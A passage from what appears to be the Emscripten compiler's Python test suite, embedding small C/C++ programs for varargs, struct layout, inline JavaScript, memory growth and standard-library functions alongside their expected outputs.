vec c(i+i%10, j*2, i%255);
vec d(j*2, j%255, i%120);
vec f = vec::add(c, d);
total += (f.x + f.y + f.z) % 100;
total %= 10240;
}
}
printf("sum:%d*\n", total);
return 0;
}
'''
self.do_run(src, 'sum:9780*')
def test_stack_varargs(self):
if self.emcc_args is None: return # too slow in other modes
Settings.INLINING_LIMIT = 50
# We should not blow up the stack with numerous varargs
src = r'''
#include <stdio.h>
#include <stdlib.h>
void func(int i) {
printf("%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d\n",
i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i);
}
int main() {
for (int i = 0; i < 1024; i++)
func(i);
printf("ok!\n");
return 0;
}
'''
Settings.TOTAL_STACK = 1024
self.do_run(src, 'ok!')
def test_stack_void(self):
Settings.INLINING_LIMIT = 50
src = r'''
#include <stdio.h>
static char s[100]="aaaaa";
static int func(void) {
if(s[0]!='a') return 0;
printf("iso open %s\n", s, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001);
return 0;
}
int main(){
int i;
for(i=0;i<5000;i++)
func();
printf(".ok.\n");
}
'''
self.do_run(src, '.ok.\n')
def test_life(self):
if self.emcc_args is None: return self.skip('need c99')
self.emcc_args += ['-std=c99']
src = open(path_from_root('tests', 'life.c'), 'r').read()
self.do_run(src, '''--------------------------------
[] [] [][][]
[] [] [] [][] [] [] []
[] [][] [][] [][][] []
[] [] [] [] [][] [] []
[] [][] [] [] [] [] [][][][]
[][] [][] [] [][][] [] []
[] [][] [][] [][] [][][]
[][] [][][] [] []
[][] [][] []
[][][]
[]
[][][]
[] [][] [][]
[][] [] [][] [][]
[][] [][]
[]
[][]
[][] []
[] [][] []
[][][] []
[] [][]
[] [] []
[]
[] [] []
[][][]
[]
[][][] []
--------------------------------
''', ['2'], force_c=True)
def test_array2(self):
src = '''
#include <stdio.h>
static const double grid[4][2] = {
{-3/3.,-1/3.},{+1/3.,-3/3.},
{-1/3.,+3/3.},{+3/3.,+1/3.}
};
int main() {
for (int i = 0; i < 4; i++)
printf("%d:%.2f,%.2f ", i, grid[i][0], grid[i][1]);
printf("\\n");
return 0;
}
'''
self.do_run(src, '0:-1.00,-0.33 1:0.33,-1.00 2:-0.33,1.00 3:1.00,0.33')
def test_array2b(self):
src = '''
#include <stdio.h>
static const struct {
unsigned char left;
unsigned char right;
} prioritah[] = {
{6, 6}, {6, 6}, {7, 95}, {7, 7}
};
int main() {
printf("*%d,%d\\n", prioritah[1].left, prioritah[1].right);
printf("%d,%d*\\n", prioritah[2].left, prioritah[2].right);
return 0;
}
'''
self.do_run(src, '*6,6\n7,95*')
def test_constglobalstructs(self):
src = '''
#include <stdio.h>
struct IUB {
int c;
double p;
unsigned int pi;
};
IUB iub[] = {
{ 'a', 0.27, 5 },
{ 'c', 0.15, 4 },
{ 'g', 0.12, 3 },
{ 't', 0.27, 2 },
};
const unsigned char faceedgesidx[6][4] =
{
{ 4, 5, 8, 10 },
{ 6, 7, 9, 11 },
{ 0, 2, 8, 9 },
{ 1, 3, 10,11 },
{ 0, 1, 4, 6 },
{ 2, 3, 5, 7 },
};
int main( int argc, const char *argv[] ) {
printf("*%d,%d,%d,%d*\\n", iub[0].c, int(iub[1].p*100), iub[2].pi, faceedgesidx[3][2]);
return 0;
}
'''
self.do_run(src, '*97,15,3,10*')
def test_conststructs(self):
src = '''
#include <stdio.h>
struct IUB {
int c;
double p;
unsigned int pi;
};
int main( int argc, const char *argv[] ) {
int before = 70;
IUB iub[] = {
{ 'a', 0.3029549426680, 5 },
{ 'c', 0.15, 4 },
{ 'g', 0.12, 3 },
{ 't', 0.27, 2 },
};
int after = 90;
printf("*%d,%d,%d,%d,%d,%d*\\n", before, iub[0].c, int(iub[1].p*100), iub[2].pi, int(iub[0].p*10000), after);
return 0;
}
'''
self.do_run(src, '*70,97,15,3,3029,90*')
def test_bigarray(self):
if self.emcc_args is None: return self.skip('need ta2 to compress type data on zeroinitializers')
# avoid "array initializer too large" errors
src = r'''
#include <stdio.h>
#include <assert.h>
#define SIZE (1024*100)
struct Struct {
char x;
int y;
};
Struct buffy[SIZE];
int main() {
for (int i = 0; i < SIZE; i++) { assert(buffy[i].x == 0 && buffy[i].y == 0); } // we were zeroinitialized
for (int i = 0; i < SIZE; i++) { buffy[i].x = i*i; buffy[i].y = i*i*i; } // we can save data
printf("*%d*\n", buffy[SIZE/3].x);
return 0;
}
'''
self.do_run(src, '*57*')
def test_mod_globalstruct(self):
src = '''
#include <stdio.h>
struct malloc_params {
size_t magic, page_size;
};
malloc_params mparams;
#define SIZE_T_ONE ((size_t)1)
#define page_align(S) (((S) + (mparams.page_size - SIZE_T_ONE)) & ~(mparams.page_size - SIZE_T_ONE))
int main()
{
mparams.page_size = 4096;
printf("*%d,%d,%d,%d*\\n", mparams.page_size, page_align(1000), page_align(6000), page_align(66474));
return 0;
}
'''
self.do_run(src, '*4096,4096,8192,69632*')
def test_pystruct(self):
src = '''
#include <stdio.h>
// Based on CPython code
union PyGC_Head {
struct {
union PyGC_Head *gc_next;
union PyGC_Head *gc_prev;
size_t gc_refs;
} gc;
long double dummy; /* force worst-case alignment */
} ;
struct gc_generation {
PyGC_Head head;
int threshold; /* collection threshold */
int count; /* count of allocations or collections of younger
generations */
};
#define NUM_GENERATIONS 3
#define GEN_HEAD(n) (&generations[n].head)
/* linked lists of container objects */
static struct gc_generation generations[NUM_GENERATIONS] = {
/* PyGC_Head, threshold, count */
{{{GEN_HEAD(0), GEN_HEAD(0), 0}}, 700, 0},
{{{GEN_HEAD(1), GEN_HEAD(1), 0}}, 10, 0},
{{{GEN_HEAD(2), GEN_HEAD(2), 0}}, 10, 0},
};
int main()
{
gc_generation *n = NULL;
printf("*%d,%d,%d,%d,%d,%d,%d,%d*\\n",
(int)(&n[0]),
(int)(&n[0].head),
(int)(&n[0].head.gc.gc_next),
(int)(&n[0].head.gc.gc_prev),
(int)(&n[0].head.gc.gc_refs),
(int)(&n[0].threshold), (int)(&n[0].count), (int)(&n[1])
);
printf("*%d,%d,%d*\\n",
(int)(&generations[0]) ==
(int)(&generations[0].head.gc.gc_next),
(int)(&generations[0]) ==
(int)(&generations[0].head.gc.gc_prev),
(int)(&generations[0]) ==
(int)(&generations[1])
);
int x1 = (int)(&generations[0]);
int x2 = (int)(&generations[1]);
printf("*%d*\\n", x1 == x2);
for (int i = 0; i < NUM_GENERATIONS; i++) {
PyGC_Head *list = GEN_HEAD(i);
printf("%d:%d,%d\\n", i, (int)list == (int)(list->gc.gc_prev), (int)list ==(int)(list->gc.gc_next));
}
printf("*%d,%d,%d*\\n", sizeof(PyGC_Head), sizeof(gc_generation), int(GEN_HEAD(2)) - int(GEN_HEAD(1)));
}
'''
if Settings.QUANTUM_SIZE == 1:
# Compressed memory. Note that sizeof() does give the fat sizes, however!
self.do_run(src, '*0,0,0,1,2,3,4,5*\n*1,0,0*\n*0*\n0:1,1\n1:1,1\n2:1,1\n*12,20,5*')
else:
if self.is_le32():
self.do_run(src, '*0,0,0,4,8,16,20,24*\n*1,0,0*\n*0*\n0:1,1\n1:1,1\n2:1,1\n*16,24,24*')
else:
self.do_run(src, '*0,0,0,4,8,12,16,20*\n*1,0,0*\n*0*\n0:1,1\n1:1,1\n2:1,1\n*12,20,20*')
def test_ptrtoint(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <stdio.h>
int main( int argc, const char *argv[] ) {
char *a = new char[10];
char *a0 = a+0;
char *a5 = a+5;
int *b = new int[10];
int *b0 = b+0;
int *b5 = b+5;
int c = (int)b5-(int)b0; // Emscripten should warn!
int d = (int)b5-(int)b0; // Emscripten should warn!
printf("*%d*\\n", (int)a5-(int)a0);
return 0;
}
'''
runner = self
def check_warnings(output):
runner.assertEquals(filter(lambda line: 'Warning' in line, output.split('\n')).__len__(), 4)
self.do_run(src, '*5*', output_processor=check_warnings)
def test_sizeof(self):
if self.emcc_args is None: return self.skip('requires emcc')
# Has invalid writes between printouts
Settings.SAFE_HEAP = 0
src = '''
#include <stdio.h>
#include <string.h>
#include "emscripten.h"
struct A { int x, y; };
int main( int argc, const char *argv[] ) {
int *a = new int[10];
int *b = new int[1];
int *c = new int[10];
for (int i = 0; i < 10; i++)
a[i] = 2;
*b = 5;
for (int i = 0; i < 10; i++)
c[i] = 8;
printf("*%d,%d,%d,%d,%d*\\n", a[0], a[9], *b, c[0], c[9]);
// Should overwrite a, but not touch b!
memcpy(a, c, 10*sizeof(int));
printf("*%d,%d,%d,%d,%d*\\n", a[0], a[9], *b, c[0], c[9]);
// Part 2
A as[3] = { { 5, 12 }, { 6, 990 }, { 7, 2 } };
memcpy(&as[0], &as[2], sizeof(A));
printf("*%d,%d,%d,%d,%d,%d*\\n", as[0].x, as[0].y, as[1].x, as[1].y, as[2].x, as[2].y);
return 0;
}
'''
self.do_run(src, '*2,2,5,8,8***8,8,5,8,8***7,2,6,990,7,2*', [], lambda x, err: x.replace('\n', '*'))
def test_float_h(self):
process = Popen([PYTHON, EMCC, path_from_root('tests', 'float+.c')], stdout=PIPE, stderr=PIPE)
process.communicate()
assert process.returncode is 0, 'float.h should agree with our system'
def test_emscripten_api(self):
#if Settings.MICRO_OPTS or Settings.RELOOP or Building.LLVM_OPTS: return self.skip('FIXME')
src = r'''
#include <stdio.h>
#include "emscripten.h"
extern "C" {
void save_me_aimee() { printf("mann\n"); }
}
int main() {
// EMSCRIPTEN_COMMENT("hello from the source");
emscripten_run_script("Module.print('hello world' + '!')");
printf("*%d*\n", emscripten_run_script_int("5*20"));
printf("*%s*\n", emscripten_run_script_string("'five'+'six'"));
emscripten_run_script("Module['_save_me_aimee']()");
return 0;
}
'''
check = '''
def process(filename):
src = open(filename, 'r').read()
# TODO: restore this (see comment in emscripten.h) assert '// hello from the source' in src
'''
Settings.EXPORTED_FUNCTIONS = ['_main', '_save_me_aimee']
self.do_run(src, 'hello world!\n*100*\n*fivesix*\nmann\n', post_build=check)
def test_inlinejs(self):
if Settings.ASM_JS: return self.skip('asm does not support random code, TODO: something that works in asm')
src = r'''
#include <stdio.h>
double get() {
double ret = 0;
__asm __volatile__("Math.abs(-12/3.3)":"=r"(ret)); // write to a variable
return ret;
}
int main() {
asm("Module.print('Inline JS is very cool')");
printf("%.2f\n", get());
return 0;
}
'''
self.do_run(src, 'Inline JS is very cool\n3.64')
def zzztest_inlinejs2(self):
if Settings.ASM_JS: return self.skip('asm does not support random code, TODO: something that works in asm')
src = r'''
#include <stdio.h>
double get() {
double ret = 0;
__asm __volatile__("Math.abs(-12/3.3)":"=r"(ret)); // write to a variable
return ret;
}
int mix(int x, int y) {
int ret;
asm("Math.pow(2, %0+%1+1)" : "=r"(ret) : "r"(x), "r"(y)); // read and write
return ret;
}
void mult() {
asm("var $_$1 = Math.abs(-100); $_$1 *= 2;"); // multiline
asm __volatile__("Module.print($_$1); Module.print('\n')");
}
int main(int argc, char **argv) {
asm("Module.print('Inline JS is very cool')");
printf("%.2f\n", get());
printf("%d\n", mix(argc, argc/2));
mult();
return 0;
}
'''
self.do_run(src, 'Inline JS is very cool\n3.64\nwaka\nzakai\n')
def test_memorygrowth(self):
if Settings.USE_TYPED_ARRAYS == 0: return self.skip('memory growth is only supported with typed arrays')
if Settings.ASM_JS: return self.skip('asm does not support memory growth yet')
# With typed arrays in particular, it is dangerous to use more memory than TOTAL_MEMORY,
# since we then need to enlarge the heap(s).
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include "emscripten.h"
int main(int argc, char **argv)
{
char *buf1 = (char*)malloc(100);
char *data1 = "hello";
memcpy(buf1, data1, strlen(data1)+1);
float *buf2 = (float*)malloc(100);
float pie = 4.955;
memcpy(buf2, &pie, sizeof(float));
printf("*pre: %s,%.3f*\n", buf1, buf2[0]);
int totalMemory = emscripten_run_script_int("TOTAL_MEMORY");
char *buf3 = (char*)malloc(totalMemory+1);
buf3[argc] = (int)buf2;
if (argc % 7 == 6) printf("%d\n", memcpy(buf3, buf1, argc));
char *buf4 = (char*)malloc(100);
float *buf5 = (float*)malloc(100);
//printf("totalMemory: %d bufs: %d,%d,%d,%d,%d\n", totalMemory, buf1, buf2, buf3, buf4, buf5);
assert((int)buf4 > (int)totalMemory && (int)buf5 > (int)totalMemory);
printf("*%s,%.3f*\n", buf1, buf2[0]); // the old heap data should still be there
memcpy(buf4, buf1, strlen(data1)+1);
memcpy(buf5, buf2, sizeof(float));
printf("*%s,%.3f*\n", buf4, buf5[0]); // and the new heap space should work too
return 0;
}
'''
# Fail without memory growth
self.do_run(src, 'Cannot enlarge memory arrays.')
fail = open('src.cpp.o.js').read()
# Win with it
Settings.ALLOW_MEMORY_GROWTH = 1
self.do_run(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
win = open('src.cpp.o.js').read()
if self.emcc_args and '-O2' in self.emcc_args:
# Make sure ALLOW_MEMORY_GROWTH generates different code (should be less optimized)
code_start = 'var TOTAL_MEMORY = '
fail = fail[fail.find(code_start):]
win = win[win.find(code_start):]
assert len(fail) < len(win), 'failing code - without memory growth on - is more optimized, and smaller'
def test_ssr(self): # struct self-ref
src = '''
#include <stdio.h>
// see related things in openjpeg
typedef struct opj_mqc_state {
unsigned int qeval;
int mps;
struct opj_mqc_state *nmps;
struct opj_mqc_state *nlps;
} opj_mqc_state_t;
static opj_mqc_state_t mqc_states[2] = {
{0x5600, 0, &mqc_states[2], &mqc_states[3]},
{0x5602, 1, &mqc_states[3], &mqc_states[2]},
};
int main() {
printf("*%d*\\n", (int)(mqc_states+1)-(int)mqc_states);
for (int i = 0; i < 2; i++)
printf("%d:%d,%d,%d,%d\\n", i, mqc_states[i].qeval, mqc_states[i].mps,
(int)mqc_states[i].nmps-(int)mqc_states, (int)mqc_states[i].nlps-(int)mqc_states);
return 0;
}
'''
if Settings.QUANTUM_SIZE == 1:
self.do_run(src, '''*4*\n0:22016,0,8,12\n1:22018,1,12,8\n''')
else:
self.do_run(src, '''*16*\n0:22016,0,32,48\n1:22018,1,48,32\n''')
def test_tinyfuncstr(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <stdio.h>
struct Class {
static char *name1() { return "nameA"; }
char *name2() { return "nameB"; }
};
int main() {
printf("*%s,%s*\\n", Class::name1(), (new Class())->name2());
return 0;
}
'''
self.do_run(src, '*nameA,nameB*')
def test_llvmswitch(self):
Settings.CORRECT_SIGNS = 1
src = '''
#include <stdio.h>
#include <string.h>
int switcher(int p)
{
switch(p) {
case 'a':
case 'b':
case 'c':
return p-1;
case -15:
return p+1;
}
return p;
}
int main( int argc, const char *argv[] ) {
unsigned int x = 0xfffffff1;
x >>= (argc-1); // force it to be unsigned for purpose of checking our switch comparison in signed/unsigned
printf("*%d,%d,%d,%d,%d,%d*\\n", switcher('a'), switcher('b'), switcher('c'), switcher(x), switcher(-15), switcher('e'));
return 0;
}
'''
self.do_run(src, '*96,97,98,-14,-14,101*')
# By default, when user has not specified a -std flag, Emscripten should always build .cpp files using the C++03 standard,
# i.e. as if "-std=c++03" had been passed on the command line. On Linux with Clang 3.2 this is the case, but on Windows
# with Clang 3.2 -std=c++11 has been chosen as default, because of
# < jrose> clb: it's deliberate, with the idea that for people who don't care about the standard, they should be using the "best" thing we can offer on that platform
def test_cxx03_do_run(self):
src = '''
#include <stdio.h>
#if __cplusplus != 199711L
#error By default, if no -std is specified, emscripten should be compiling with -std=c++03!
#endif
int main( int argc, const char *argv[] ) {
printf("Hello world!\\n");
return 0;
}
'''
self.do_run(src, 'Hello world!')
def test_bigswitch(self):
if Settings.RELOOP: return self.skip('TODO: switch in relooper, issue #781')
if Settings.ASM_JS: return self.skip('TODO: switch too large for asm')
src = open(path_from_root('tests', 'bigswitch.cpp')).read()
self.do_run(src, '''34962: GL_ARRAY_BUFFER (0x8892)
26214: what?
35040: GL_STREAM_DRAW (0x88E0)
''', args=['34962', '26214', '35040'])
def test_indirectbr(self):
Building.COMPILER_TEST_OPTS = filter(lambda x: x != '-g', Building.COMPILER_TEST_OPTS)
src = '''
#include <stdio.h>
int main(void) {
const void *addrs[2] = { &&FOO, &&BAR };
// confuse the optimizer so it doesn't hardcode the jump and avoid generating an |indirectbr| instruction
int which = 0;
for (int x = 0; x < 1000; x++) which = (which + x*x) % 7;
which = (which % 2) + 1;
goto *addrs[which];
FOO:
printf("bad\\n");
return 0;
BAR:
printf("good\\n");
const void *addr = &&FOO;
goto *addr;
}
'''
self.do_run(src, 'good\nbad')
def test_indirectbr_many(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('blockaddr > 255 requires ta2')
blocks = range(1500)
init = ', '.join(['&&B%d' % b for b in blocks])
defs = '\n'.join(['B%d: printf("%d\\n"); return 0;' % (b,b) for b in blocks])
src = '''
#include <stdio.h>
int main(int argc, char **argv) {
printf("\\n");
const void *addrs[] = { %s };
goto *addrs[argc*argc + 1000];
%s
return 0;
}
''' % (init, defs)
self.do_run(src, '\n1001\n')
def test_pack(self):
src = '''
#include <stdio.h>
#include <string.h>
#pragma pack(push,1)
typedef struct header
{
unsigned char id;
unsigned short colour;
unsigned char desc;
} header;
#pragma pack(pop)
typedef struct fatheader
{
unsigned char id;
unsigned short colour;
unsigned char desc;
} fatheader;
int main( int argc, const char *argv[] ) {
header h, *ph = 0;
fatheader fh, *pfh = 0;
printf("*%d,%d,%d*\\n", sizeof(header), (int)((int)&h.desc - (int)&h.id), (int)(&ph[1])-(int)(&ph[0]));
printf("*%d,%d,%d*\\n", sizeof(fatheader), (int)((int)&fh.desc - (int)&fh.id), (int)(&pfh[1])-(int)(&pfh[0]));
return 0;
}
'''
if Settings.QUANTUM_SIZE == 1:
self.do_run(src, '*4,2,3*\n*6,2,3*')
else:
self.do_run(src, '*4,3,4*\n*6,4,6*')
def test_varargs(self):
if Settings.QUANTUM_SIZE == 1: return self.skip('FIXME: Add support for this')
if not self.is_le32(): return self.skip('we do not support all varargs stuff without le32')
src = '''
#include <stdio.h>
#include <stdarg.h>
void vary(const char *s, ...)
{
va_list v;
va_start(v, s);
char d[20];
vsnprintf(d, 20, s, v);
puts(d);
// Try it with copying
va_list tempva;
va_copy(tempva, v);
vsnprintf(d, 20, s, tempva);
puts(d);
va_end(v);
}
void vary2(char color, const char *s, ...)
{
va_list v;
va_start(v, s);
char d[21];
d[0] = color;
vsnprintf(d+1, 20, s, v);
puts(d);
va_end(v);
}
void varargs_listoffsets_list_evaluate(int count, va_list ap, int vaIteration)
{
while(count > 0)
{
const char* string = va_arg(ap, const char*);
printf("%s", string);
count--;
}
printf("\\n");
}
void varags_listoffsets_list_copy(int count, va_list ap, int iteration)
{
va_list ap_copy;
va_copy(ap_copy, ap);
varargs_listoffsets_list_evaluate(count, ap_copy, iteration);
va_end(ap_copy);
}
void varargs_listoffsets_args(int type, int count, ...)
{
va_list ap;
va_start(ap, count);
// evaluate a copied list
varags_listoffsets_list_copy(count, ap, 1);
varags_listoffsets_list_copy(count, ap, 2);
varags_listoffsets_list_copy(count, ap, 3);
varags_listoffsets_list_copy(count, ap, 4);
varargs_listoffsets_list_evaluate(count, ap, 1);
// NOTE: we expect this test to fail, so we will check the stdout for <BAD+0><BAD+1>.....
varargs_listoffsets_list_evaluate(count, ap, 2);
// NOTE: this test has to work again, as we restart the list
va_end(ap);
va_start(ap, count);
varargs_listoffsets_list_evaluate(count, ap, 3);
va_end(ap);
}
void varargs_listoffsets_main()
{
varargs_listoffsets_args(0, 5, "abc", "def", "ghi", "jkl", "mno", "<BAD+0>", "<BAD+1>", "<BAD+2>", "<BAD+3>", "<BAD+4>", "<BAD+5>", "<BAD+6>", "<BAD+7>", "<BAD+8>", "<BAD+9>", "<BAD+10>", "<BAD+11>", "<BAD+12>", "<BAD+13>", "<BAD+14>", "<BAD+15>", "<BAD+16>");
}
#define GETMAX(pref, type) \
type getMax##pref(int num, ...) \
{ \
va_list vv; \
va_start(vv, num); \
type maxx = va_arg(vv, type); \
for (int i = 1; i < num; i++) \
{ \
type curr = va_arg(vv, type); \
maxx = curr > maxx ? curr : maxx; \
} \
va_end(vv); \
return maxx; \
}
GETMAX(i, int);
GETMAX(D, double);
int main(int argc, char **argv) {
vary("*cheez: %d+%d*", 0, 24); // Also tests that '0' is not special as an array ender
vary("*albeit*"); // Should not fail with no var args in vararg function
vary2('Q', "%d*", 85);
int maxxi = getMaxi(6, 2, 5, 21, 4, -10, 19);
printf("maxxi:%d*\\n", maxxi);
double maxxD = getMaxD(6, (double)2.1, (double)5.1, (double)22.1, (double)4.1, (double)-10.1, (double)19.1, (double)2);
printf("maxxD:%.2f*\\n", (float)maxxD);
// And, as a function pointer
void (*vfp)(const char *s, ...) = argc == 1211 ? NULL : vary;
vfp("*vfp:%d,%d*", 22, 199);
// ensure lists work properly when copied, reinited etc.
varargs_listoffsets_main();
return 0;
}
'''
self.do_run(src, '*cheez: 0+24*\n*cheez: 0+24*\n*albeit*\n*albeit*\nQ85*\nmaxxi:21*\nmaxxD:22.10*\n*vfp:22,199*\n*vfp:22,199*\n'+
'abcdefghijklmno\nabcdefghijklmno\nabcdefghijklmno\nabcdefghijklmno\nabcdefghijklmno\n<BAD+0><BAD+1><BAD+2><BAD+3><BAD+4>\nabcdefghijklmno\n')
def test_varargs_byval(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('FIXME: Add support for this')
if self.is_le32(): return self.skip('clang cannot compile this code with that target yet')
src = r'''
#include <stdio.h>
#include <stdarg.h>
typedef struct type_a {
union {
double f;
void *p;
int i;
short sym;
} value;
} type_a;
enum mrb_vtype {
MRB_TT_FALSE = 0, /* 0 */
MRB_TT_CLASS = 9 /* 9 */
};
typedef struct type_b {
enum mrb_vtype tt:8;
} type_b;
void print_type_a(int argc, ...);
void print_type_b(int argc, ...);
int main(int argc, char *argv[])
{
type_a a;
type_b b;
a.value.p = (void*) 0x12345678;
b.tt = MRB_TT_CLASS;
printf("The original address of a is: %p\n", a.value.p);
printf("The original type of b is: %d\n", b.tt);
print_type_a(1, a);
print_type_b(1, b);
return 0;
}
void print_type_a(int argc, ...) {
va_list ap;
type_a a;
va_start(ap, argc);
a = va_arg(ap, type_a);
va_end(ap);
printf("The current address of a is: %p\n", a.value.p);
}
void print_type_b(int argc, ...) {
va_list ap;
type_b b;
va_start(ap, argc);
b = va_arg(ap, type_b);
va_end(ap);
printf("The current type of b is: %d\n", b.tt);
}
'''
self.do_run(src, '''The original address of a is: 0x12345678
The original type of b is: 9
The current address of a is: 0x12345678
The current type of b is: 9
''')
def test_structbyval(self):
Settings.INLINING_LIMIT = 50
# part 1: make sure that normally, passing structs by value works
src = r'''
#include <stdio.h>
struct point
{
int x, y;
};
void dump(struct point p) {
p.x++; // should not modify
p.y++; // anything in the caller!
printf("dump: %d,%d\n", p.x, p.y);
}
void dumpmod(struct point *p) {
p->x++; // should not modify
p->y++; // anything in the caller!
printf("dump: %d,%d\n", p->x, p->y);
}
int main( int argc, const char *argv[] ) {
point p = { 54, 2 };
printf("pre: %d,%d\n", p.x, p.y);
dump(p);
void (*dp)(point p) = dump; // And, as a function pointer
dp(p);
printf("post: %d,%d\n", p.x, p.y);
dumpmod(&p);
dumpmod(&p);
printf("last: %d,%d\n", p.x, p.y);
return 0;
}
'''
self.do_run(src, 'pre: 54,2\ndump: 55,3\ndump: 55,3\npost: 54,2\ndump: 55,3\ndump: 56,4\nlast: 56,4')
# Check for lack of warning in the generated code (they should appear in part 2)
generated = open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read()
assert 'Casting a function pointer type to another with a different number of arguments.' not in generated, 'Unexpected warning'
# part 2: make sure we warn about mixing c and c++ calling conventions here
if not (self.emcc_args is None or self.emcc_args == []): return # Optimized code is missing the warning comments
header = r'''
struct point
{
int x, y;
};
'''
open(os.path.join(self.get_dir(), 'header.h'), 'w').write(header)
supp = r'''
#include <stdio.h>
#include "header.h"
void dump(struct point p) {
p.x++; // should not modify
p.y++; // anything in the caller!
printf("dump: %d,%d\n", p.x, p.y);
}
'''
supp_name = os.path.join(self.get_dir(), 'supp.c')
open(supp_name, 'w').write(supp)
main = r'''
#include <stdio.h>
#include "header.h"
#ifdef __cplusplus
extern "C" {
#endif
void dump(struct point p);
#ifdef __cplusplus
}
#endif
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
printf("pre: %d,%d\n", p.x, p.y);
dump(p);
void (*dp)(struct point p) = dump; // And, as a function pointer
dp(p);
printf("post: %d,%d\n", p.x, p.y);
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.cpp')
open(main_name, 'w').write(main)
Building.emcc(supp_name)
Building.emcc(main_name)
all_name = os.path.join(self.get_dir(), 'all.bc')
Building.link([supp_name + '.o', main_name + '.o'], all_name)
# This will fail! See explanation near the warning we check for, in the compiler source code
output = Popen([PYTHON, EMCC, all_name], stderr=PIPE).communicate()
# Check for warning in the generated code
generated = open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read()
if 'i386-pc-linux-gnu' in COMPILER_OPTS:
assert 'Casting a function pointer type to a potentially incompatible one' in output[1], 'Missing expected warning'
else:
print >> sys.stderr, 'skipping C/C++ conventions warning check, since not i386-pc-linux-gnu'
def test_stdlibs(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.USE_TYPED_ARRAYS == 2:
# Typed arrays = 2 + safe heap prints a warning that messes up our output.
Settings.SAFE_HEAP = 0
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
void clean()
{
printf("*cleaned*\\n");
}
int comparer(const void *a, const void *b) {
int aa = *((int*)a);
int bb = *((int*)b);
return aa - bb;
}
int main() {
// timeofday
timeval t;
gettimeofday(&t, NULL);
printf("*%d,%d\\n", int(t.tv_sec), int(t.tv_usec)); // should not crash
// atexit
atexit(clean);
// qsort
int values[6] = { 3, 2, 5, 1, 5, 6 };
qsort(values, 5, sizeof(int), comparer);
printf("*%d,%d,%d,%d,%d,%d*\\n", values[0], values[1], values[2], values[3], values[4], values[5]);
printf("*stdin==0:%d*\\n", stdin == 0); // check that external values are at least not NULL
printf("*%%*\\n");
printf("*%.1ld*\\n", 5);
printf("*%.1f*\\n", strtod("66", NULL)); // checks dependency system, as our strtod needs _isspace etc.
printf("*%ld*\\n", strtol("10", NULL, 0));
printf("*%ld*\\n", strtol("0", NULL, 0));
printf("*%ld*\\n", strtol("-10", NULL, 0));
printf("*%ld*\\n", strtol("12", NULL, 16));
printf("*%lu*\\n", strtoul("10", NULL, 0));
printf("*%lu*\\n", strtoul("0", NULL, 0));
printf("*%lu*\\n", strtoul("-10", NULL, 0));
printf("*malloc(0)!=0:%d*\\n", malloc(0) != 0); // We should not fail horribly
return 0;
}
'''
self.do_run(src, '*1,2,3,5,5,6*\n*stdin==0:0*\n*%*\n*5*\n*66.0*\n*10*\n*0*\n*-10*\n*18*\n*10*\n*0*\n*4294967286*\n*malloc(0)!=0:1*\n*cleaned*')
src = r'''
#include <stdio.h>
#include <stdbool.h>
int main() {
bool x = true;
bool y = false;
printf("*%d*\n", x != y);
return 0;
}
'''
self.do_run(src, '*1*', force_c=True)
def test_strtoll_hex(self):
if self.emcc_args is None: return self.skip('requires emcc')
# tests strtoll for hex strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "0x4 -0x3A +0xDEADBEEF";
char *end_char;
// undefined base
long long int l1 = strtoll(STRING, &end_char, 0);
